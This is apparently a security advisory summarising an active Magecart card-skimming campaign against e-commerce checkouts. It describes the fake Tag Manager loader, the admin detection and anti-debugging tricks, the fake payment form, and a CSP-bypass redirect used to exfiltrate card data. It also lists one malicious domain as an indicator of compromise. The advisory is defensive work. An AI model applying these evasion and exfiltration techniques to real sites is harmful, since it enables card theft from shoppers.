An active Magecart campaign targeting ecommerce sites has been uncovered, featuring payloads customized per victim with sophisticated evasion techniques. The attack begins with a script injection disguised as a Google Tag Manager loader, which decodes a base64 URL at runtime to inject malicious JavaScript. The skimmer includes admin detection to avoid triggering for site owners, anti-debugging via performance.now() timing, and platform fingerprinting for WooCommerce, Magento, OpenCart, and PrestaShop. It injects a fake payment form styled to match the real one, captures card data to localStorage, and exfiltrates it — including a 'CSP bypass' technique that redirects victims through attacker infrastructure with stolen data in the URL before bouncing them back. The campaign is ongoing, with the malicious domain styleoutsperee.com (registered Feb 2026) as the key indicator of compromise. Defenders are advised to audit checkout scripts, monitor for requests to that domain, and investigate unexpected redirects during payment flows.
Table of contents
The Magecart ThreatThe initial compromiseTargeted attackSkimmer activationThe CSP BypassOngoing threatWhat defenders should do nowIndicators of CompromiseSort: